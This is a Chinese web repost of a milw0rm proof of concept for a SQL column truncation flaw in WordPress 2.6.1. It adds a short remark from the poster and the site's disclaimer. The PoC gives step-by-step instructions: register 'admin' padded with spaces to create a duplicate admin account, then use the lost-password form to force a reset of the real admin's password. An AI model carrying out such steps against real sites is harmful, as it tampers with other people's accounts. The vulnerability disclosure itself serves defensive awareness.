WordPress 2.6.1 SQL Column Truncation Vulnerability分析
番茄系统家园 · 2021-09-16 02:56:44
用wordpress的要注意了,不过拿我这里测试就没效果了,我从一开始就是关闭用户注册的。
WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)
found by irk4z[at]yahoo.pl
homepage: http://irk4z.wordpress.com/
this is not critical vuln [;
first, read this discovery:
http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/
in this hack we can remote change admin password, if registration enabled
greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends
-
go to url: server.com/wp-login.php?action=register
-
register as:
login: admin x
email: your email^ admin[55 space chars]x
now, we have duplicated 'admin' account in database
-
go to url: server.com/wp-login.php?action=lostpassword
-
write your email into field and submit this form
-
check your email and go to reset confirmation link
-
admin's password changed, but new password will be send to correct admin email ;/
milw0rm.com
免责声明: 凡标注转载/编译字样内容并非本站原创,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。如果你觉得本文好,欢迎推荐给朋友阅读;本文链接: https://m.nndssk.com/wlaq/1719037x8nSu.html。猜你喜欢
最新应用
热门应用

